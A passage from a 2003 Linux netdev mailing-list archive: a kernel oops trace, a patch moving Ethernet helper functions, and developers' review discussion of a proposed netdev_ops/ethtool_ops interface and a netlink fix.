virtual address 6b6b6b6b ack printing eip: inet addr:127.0c01a0f22 .0.1 Mask:255.0*pde = 00000000 .0.0 Oops: 0000 [#1] CPU: 0 EIP: 0060:[] Not tainted EFLAGS: 00010202 EIP is at __release_sock+0x22/0x60 eax: 6b6b6b6b ebx: 00000000 ecx: 00000000 edx: c3cd2c44 esi: c3cd2c44 edi: c3cd2c44 ebp: c10b7f00 esp: c10b7ef8 ds: 007b es: 007b ss: 0068 Process ifconfig (pid: 37, threadinfo=c10b6000 task=c10ce060) Stack: 00000000 c3cd2c88 c10b7f18 c01ee728 c3cd2c44 c3cd2c44 c3ed1d2c c3cdb494 c10b7f40 c01eebf8 c3cd2c44 c3cd2c44 00000000 00000000 00000000 c3cdb494 00000000 c3cdb4b8 c10b7f54 c019e1d6 c3cdb494 c3cdb4b8 c3ced41c c10b7f64 Call Trace: [] x25_destroy_socket+0x188/0x1a0 [] x25_release+0x38/0xa0 [] sock_release+0x56/0x80 [] sock_close+0x23/0x40 [] __fput+0xd6/0xe0 [] filp_close+0x3b/0x60 [] sys_close+0x47/0x60 [] syscall_call+0x7/0xb Code: 8b 18 c7 00 00 00 00 00 50 56 ff 96 1c 01 00 00 85 db 5a 89 UP LOOPBACK RUNN<0>Kernel panic: Fatal exception in interrupt ING MTU:16436 In interrupt handler - not syncing Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) -- Krzysztof Halasa Network Administrator From willy@www.linux.org.uk Fri Jul 11 11:19:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 11:19:54 -0700 (PDT) Received: from www.linux.org.uk (IDENT:XpQQKK9Omct24Pi0ZSXbJdJnepPwHcwq@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BIJl2x029840 for ; Fri, 11 Jul 2003 11:19:49 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b2Uk-0003Fl-Po for netdev@oss.sgi.com; Fri, 11 Jul 2003 19:19:46 +0100 Date: Fri, 11 Jul 2003 19:19:46 +0100 From: Matthew Wilcox To: netdev@oss.sgi.com Subject: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 3967 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c to net/ethernet/eth.c Index: drivers/net/net_init.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/net_init.c,v retrieving revision 1.4 diff -u -p -r1.4 net_init.c --- drivers/net/net_init.c 14 Jun 2003 22:15:21 -0000 1.4 +++ drivers/net/net_init.c 10 Jul 2003 20:57:55 -0000 @@ -222,23 +222,6 @@ struct net_device *alloc_etherdev(int si EXPORT_SYMBOL(init_etherdev); EXPORT_SYMBOL(alloc_etherdev); -static int eth_mac_addr(struct net_device *dev, void *p) -{ - struct sockaddr *addr=p; - if (netif_running(dev)) - return -EBUSY; - memcpy(dev->dev_addr, addr->sa_data,dev->addr_len); - return 0; -} - -static int eth_change_mtu(struct net_device *dev, int new_mtu) -{ - if ((new_mtu < 68) || (new_mtu > 1500)) - return -EINVAL; - dev->mtu = new_mtu; - return 0; -} - #ifdef CONFIG_FDDI /** Index: include/linux/etherdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/etherdevice.h,v retrieving revision 1.3 diff -u -p -r1.3 etherdevice.h --- include/linux/etherdevice.h 14 Jun 2003 22:16:01 -0000 1.3 +++ include/linux/etherdevice.h 10 Jul 2003 21:00:23 -0000 @@ -38,6 +38,8 @@ extern int eth_header_cache(struct neig struct hh_cache *hh); extern int eth_header_parse(struct sk_buff *skb, unsigned char *haddr); +extern int eth_mac_addr(struct net_device *dev, void *p); +extern int eth_change_mtu(struct net_device *dev, int new_mtu); extern struct net_device *init_etherdev(struct net_device *dev, int sizeof_priv); extern struct net_device *alloc_etherdev(int sizeof_priv); static inline void eth_copy_and_sum (struct sk_buff *dest, unsigned char *src, int len, int base) Index: net/ethernet/eth.c =================================================================== RCS file: /var/cvs/linux-2.5/net/ethernet/eth.c,v retrieving revision 1.4 diff -u -p -r1.4 eth.c --- net/ethernet/eth.c 23 Jun 2003 03:30:58 -0000 1.4 +++ net/ethernet/eth.c 10 Jul 2003 20:58:54 -0000 @@ -241,3 +241,20 @@ void eth_header_cache_update(struct hh_c memcpy(((u8*)hh->hh_data) + HH_DATA_OFF(sizeof(struct ethhdr)), haddr, dev->addr_len); } + +int eth_mac_addr(struct net_device *dev, void *p) +{ + struct sockaddr *addr=p; + if (netif_running(dev)) + return -EBUSY; + memcpy(dev->dev_addr, addr->sa_data, dev->addr_len); + return 0; +} + +int eth_change_mtu(struct net_device *dev, int new_mtu) +{ + if ((new_mtu < 68) || (new_mtu > 1500)) + return -EINVAL; + dev->mtu = new_mtu; + return 0; +} -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From garzik@gtf.org Fri Jul 11 11:23:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 11:23:39 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BINZ2x030179 for ; Fri, 11 Jul 2003 11:23:36 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 2267C6687; Fri, 11 Jul 2003 14:23:30 -0400 (EDT) Date: Fri, 11 Jul 2003 14:23:30 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711182330.GC16037@gtf.org> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 3968 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: > Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c > to net/ethernet/eth.c Why? It's not used outside of net_init.c AFAICS. And even so, don't you want to export those symbols? Jeff From garzik@gtf.org Fri Jul 11 12:32:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:32:31 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJWL2x001899 for ; Fri, 11 Jul 2003 12:32:22 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 9B8A0665C; Fri, 11 Jul 2003 15:32:15 -0400 (EDT) Date: Fri, 11 Jul 2003 15:32:15 -0400 From: Jeff Garzik To: Matthew Wilcox Cc: netdev@oss.sgi.com, greearb@candelatech.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711193215.GH16037@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> User-Agent: Mutt/1.3.28i X-archive-position: 3969 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Comments: 1) The _ops are either too limited in scope, or too wide in scope. We have a bunch of function pointers in struct net_device. We are adding a bunch more func ptrs in a new struct foo_ops. If it is called ethtool_ops, I can support the addition of struct ethtool_ops *etops; to struct net_device. However, if we call it netdev_ops, the structure's name no longer describes its purpose. If we call it netdev_ops, we should move ALL the function pointers in struct net_device into netdev_ops as well, and deal with the associated driver breakage. So, either change the name back to ethtool_ops, or go all the way. The current name to me implies a job half-done. Personally, I would prefer the more radical "move all funcptrs into netdev_ops". This is closer to other Linux kernel APIs. 2) Yes, we do want a feature macro for this. David, I respectfully disagree with "no back compat" type arguments. Besides h/w vendors who want to support distros currently in the field (read: not the latest kernel), _I_ am personally impacted by API divergence. As I have said (and proven) many times, I personally spend time keeping the more popular ethernet drivers in sync, 2.4 <-> 2.5. Each time a 2.5-specific change is added that is not easily massaged by a back compat macro, it costs me time. Hand-applying patches is not fun. 2.a) There is established precedent: grep for HAVE_xxx in netdevice.h and look at the ton of hits you get. 2.b) If #1 is decided to be ethtool_ops, create HAVE_ETHTOOL_OPS macro 2.c) If #2 is decided to be netdev_ops, and all func ptrs are moved into netdev_ops struct, then create the macro SET_NETDEV_OPS(dev, ops) This allows full back compat, without ugliness in mainline tree. 3) The func ptrs _count() are totally bogus. We have an unconditional indirect reference to a function call which does nothing but return a driver constant. I personally think that having ethtool_ops members manually calling the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. 3.a) Further, we will inevitably be adding more counts in the future. If we wanted to be truly expandable, and you really don't like the counts being in struct ethtool_gdrvinfo, then create a struct ethtool_counts that puts all the constants in one place. 4) I don't see why ethtool.h suddenly needs to include linux/types.h, when it hasn't needed it in all this time until now. 5) net/socket.c changes appear unrelated to this patch. 6) (low prio) Add documentation to Documentation/networking/netdevices.txt. Most importantly, this documents locking/context. 7) (low prio) All that similar code in net/core/ethtool.c can be template-ized with a macro, IMO. Something like DEF_ETHTOOL_GOP(get_coalesce, ETHTOOL_GCOALESCE, ethtool_coalesce); DEF_ETHTOOL_SOP(set_coalesce, ethtool_coalesce); (and templates for the ops that use edata) 8) (security) get-eeprom op needs to check that offset+len is not invalid, and does not wrap. 9) phys_id op should return an error, for consistency if nothing else. It's simple for driver authors to unconditionally return 0 if their code has no failure cases, and it's a slow path so adding the return in the driver code is no big deal. 10) (low prio) since it's a slow path, what about replacing the switch statement in dev_ethtool() with a lookup table? All the ethtool commands are low numbers. If you do this, I would suggest using the gcc array initializer syntax: [ETHTOOL_GCOALESCE, ethtool_get_coalesce] All the ethtool ops have the same prototype, after all. Comments? From greearb@candelatech.com Fri Jul 11 12:51:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:51:50 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJph2x017250 for ; Fri, 11 Jul 2003 12:51:44 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BJpOKk001019; Fri, 11 Jul 2003 12:51:25 -0700 Message-ID: <3F0F153C.4040506@candelatech.com> Date: Fri, 11 Jul 2003 12:51:24 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> In-Reply-To: <20030711193215.GH16037@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3970 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > Comments: > > 1) The _ops are either too limited in scope, or too wide in scope. > > We have a bunch of function pointers in struct net_device. > We are adding a bunch more func ptrs in a new struct foo_ops. > > If it is called ethtool_ops, I can support the addition of > struct ethtool_ops *etops; > to struct net_device. > > However, if we call it netdev_ops, the structure's name no longer > describes its purpose. If we call it netdev_ops, we should move ALL the > function pointers in struct net_device into netdev_ops as well, and deal > with the associated driver breakage. > > So, either change the name back to ethtool_ops, or go all the way. > The current name to me implies a job half-done. > > Personally, I would prefer the more radical "move all funcptrs into > netdev_ops". This is closer to other Linux kernel APIs. Either way, I'd vote for netdev_ops, because I want to add generic 'ioctls' that work on struct net_device, not necessarily just ethernet devices. However, it's a minor issue since the code will work regardless. > 3) The func ptrs _count() are totally bogus. We have an unconditional > indirect reference to a function call which does nothing but return a > driver constant. > > I personally think that having ethtool_ops members manually calling > the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. > > 3.a) Further, we will inevitably be adding more counts in the future. > If we wanted to be truly expandable, and you really don't like the > counts being in struct ethtool_gdrvinfo, then create a struct > ethtool_counts that puts all the constants in one place. Suppose we do this, how will we make a user-space app that tries to read this be backwards/forwards compatible? This is one of the reasons I was hoping for some versioning information that could be probed at run-time from user-space. Could bump the version each time we change something that is difficult to detect in user-space. (ie, adding a new ethtool-cmd is easy to detect because we'll get EINVAL or something when it's not there, and a success when it is, but getting a different sized struct, or a struct who's members have changed their meaning, will be more difficult to detect I believe.) Programs that do not wish to deal with the cruft of versioning can just ignore it, but ones that are designed to be very robust can do the extra work to deal with the different versions. > > > 4) I don't see why ethtool.h suddenly needs to include linux/types.h, > when it hasn't needed it in all this time until now. If we're changing lots of stuff...it would be nice to change the u32 etc to something that user-space can easily handle, as ethtool.h is (for better or worse) being included from user-space. Minor issue again as it can be dealt with via type-defs etc. Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From garzik@gtf.org Fri Jul 11 12:59:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 12:59:07 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BJx22x018079 for ; Fri, 11 Jul 2003 12:59:02 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id A9EC7665C; Fri, 11 Jul 2003 15:58:56 -0400 (EDT) Date: Fri, 11 Jul 2003 15:58:56 -0400 From: Jeff Garzik To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711195856.GB30449@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <3F0F153C.4040506@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F153C.4040506@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3971 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 12:51:24PM -0700, Ben Greear wrote: > >3) The func ptrs _count() are totally bogus. We have an unconditional > >indirect reference to a function call which does nothing but return a > >driver constant. > > > >I personally think that having ethtool_ops members manually calling > >the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. > > > >3.a) Further, we will inevitably be adding more counts in the future. > >If we wanted to be truly expandable, and you really don't like the > >counts being in struct ethtool_gdrvinfo, then create a struct > >ethtool_counts that puts all the constants in one place. > > Suppose we do this, how will we make a user-space app that tries to > read this be backwards/forwards compatible? It's trivial to return the existing values in the gdrvinfo struct in addition to a new ethtool_count struct. Full ABI compat is maintained. > >4) I don't see why ethtool.h suddenly needs to include linux/types.h, > >when it hasn't needed it in all this time until now. > > If we're changing lots of stuff...it would be nice to change the u32 > etc to something that user-space can easily handle, as ethtool.h is > (for better or worse) being included from user-space. Minor issue > again as it can be dealt with via type-defs etc. ethtool.h isn't included in the "lots of stuff" that is changing :) As you see from Matthew's patch, all changes to ethtool.h are non-essential. Regardless, addressing your point, I consider ethtool.h a kernel-internal header, that's why it uses internal kernel types. Anybody who copies it to userspace must deal with that. It is _not_ intended to be #included directly from userspace. ethtool (the userland program) purposefully does its own typedefs and stuff. Jeff From greearb@candelatech.com Fri Jul 11 13:07:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 13:07:35 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BK7U2x018944 for ; Fri, 11 Jul 2003 13:07:30 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BK77Kk003058; Fri, 11 Jul 2003 13:07:07 -0700 Message-ID: <3F0F18EB.9020609@candelatech.com> Date: Fri, 11 Jul 2003 13:07:07 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> <3F0F153C.4040506@candelatech.com> <20030711195856.GB30449@gtf.org> In-Reply-To: <20030711195856.GB30449@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3972 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > Regardless, addressing your point, I consider ethtool.h a > kernel-internal header, that's why it uses internal kernel types. > Anybody who copies it to userspace must deal with that. It is _not_ > intended to be #included directly from userspace. ethtool (the userland > program) purposefully does its own typedefs and stuff. Any particular reason to not include it directly? It seems no more likely to cause problems than to use some potentially out-of-date copy in user-space. (And it might make the compile slightly tougher if you are distributing primarily as source.) Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Fri Jul 11 13:22:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 13:22:28 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Ps7Jkti7p0v3eSE3YE9HD4rxkVLvkPRO@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BKMM2x019383 for ; Fri, 11 Jul 2003 13:22:23 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b2aI-0003WB-NJ; Fri, 11 Jul 2003 19:25:30 +0100 Date: Fri, 11 Jul 2003 19:25:30 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711182330.GC16037@gtf.org> User-Agent: Mutt/1.4.1i X-archive-position: 3973 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 02:23:30PM -0400, Jeff Garzik wrote: > On Fri, Jul 11, 2003 at 07:19:46PM +0100, Matthew Wilcox wrote: > > Move eth_mac_addr() and eth_change_mtu() from drivers/net/net_init.c > > to net/ethernet/eth.c > > Why? It's not used outside of net_init.c AFAICS. Preparation for the next stage of netdev_ops > And even so, don't you want to export those symbols? Yep, you're right, I'll need to do that too. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From willy@www.linux.org.uk Fri Jul 11 14:05:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 14:05:31 -0700 (PDT) Received: from www.linux.org.uk (IDENT:jA8tYPLAF0T/9r9Y9pw9KeedaHMHDFiC@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BL5O2x021030 for ; Fri, 11 Jul 2003 14:05:24 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b550-0006y8-Pb; Fri, 11 Jul 2003 22:05:22 +0100 Date: Fri, 11 Jul 2003 22:05:22 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F24B1.5050200@pobox.com> User-Agent: Mutt/1.4.1i X-archive-position: 3974 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > Well, I don't see/understand this next-stage, so elaboration would be > nice. As-is, I do not support merging this patch. It's the next stage you're calling for -- move these functions: dev->change_mtu = eth_change_mtu; dev->hard_header = eth_header; dev->rebuild_header = eth_rebuild_header; dev->set_mac_address = eth_mac_addr; dev->hard_header_cache = eth_header_cache; dev->header_cache_update= eth_header_cache_update; dev->hard_header_parse = eth_header_parse; into netdev_ops. Which means each driver will need to see them. I thought I could justify moving these functions already on the grounds that if you were looking for the definition of eth_change_mtu(), net_init.c would be a much less likely place to look than net/ethernet/eth.c -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From willy@www.linux.org.uk Fri Jul 11 14:56:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 14:56:50 -0700 (PDT) Received: from www.linux.org.uk (IDENT:RmxoIlt5ODsZ517Je9ENpFD1oPdh+ibf@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BLue2x022731 for ; Fri, 11 Jul 2003 14:56:41 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b5sd-0000Mj-MV; Fri, 11 Jul 2003 22:56:39 +0100 Date: Fri, 11 Jul 2003 22:56:39 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu Message-ID: <20030711215639.GN20424@parcelfarce.linux.theplanet.co.uk> References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> <3F0F294F.4060804@pobox.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0F294F.4060804@pobox.com> User-Agent: Mutt/1.4.1i X-archive-position: 3975 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 05:17:03PM -0400, Jeff Garzik wrote: > Matthew Wilcox wrote: > >On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > > > >>Well, I don't see/understand this next-stage, so elaboration would be > >>nice. As-is, I do not support merging this patch. > > > > > >It's the next stage you're calling for -- move these functions: > > > > dev->change_mtu = eth_change_mtu; > > dev->hard_header = eth_header; > > dev->rebuild_header = eth_rebuild_header; > > dev->set_mac_address = eth_mac_addr; > > dev->hard_header_cache = eth_header_cache; > > dev->header_cache_update= eth_header_cache_update; > > dev->hard_header_parse = eth_header_parse; > > > >into netdev_ops. Which means each driver will need to see them. > > Drivers don't need to see them now, they shouldn't need to see them > after netdev_ops. > > It's hidden by ether_setup. Umm. Technically, yes. Seems a bit ugly to assign to the netdev_ops struct which is shared between the devices. Won't _break_ anything (unless some crazed person has a driver which drives the ethernet and token ring versions of the same chip ;-) -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From davem@redhat.com Fri Jul 11 22:18:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:19:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5Iq2x029465 for ; Fri, 11 Jul 2003 22:18:52 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31743; Fri, 11 Jul 2003 22:09:05 -0700 Date: Fri, 11 Jul 2003 22:09:05 -0700 From: "David S. Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030711220905.2ea9ebc5.davem@redhat.com> In-Reply-To: References: <3F0DB9A5.23723BE1@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3976 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 01:37:44 +1000 (EST) James Morris wrote: > On Thu, 10 Jul 2003, Jim Keniston wrote: > > > That begs the question: do we trust that nobody but the kernel will send > > packets to a NETLINK_KERROR socket? Ordinary users can't, but any root > > application can. Without kerror_netlink_rcv(), such packets don't get > > dequeued. > > Indeed, the kernel socket buffer fills up. > > I think this needs to be addressed in the netlink code, per the patch > below. Looks good, I'll apply this. From davem@redhat.com Fri Jul 11 22:51:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:52:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5oh2x029936 for ; Fri, 11 Jul 2003 22:51:23 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31830; Fri, 11 Jul 2003 22:41:42 -0700 Date: Fri, 11 Jul 2003 22:41:42 -0700 From: "David S. Miller" To: James Morris Cc: jkenisto@us.ibm.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting Message-Id: <20030711224142.557b5b5e.davem@redhat.com> In-Reply-To: References: <3F0DB9A5.23723BE1@us.ibm.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3977 X-ecartis-version: 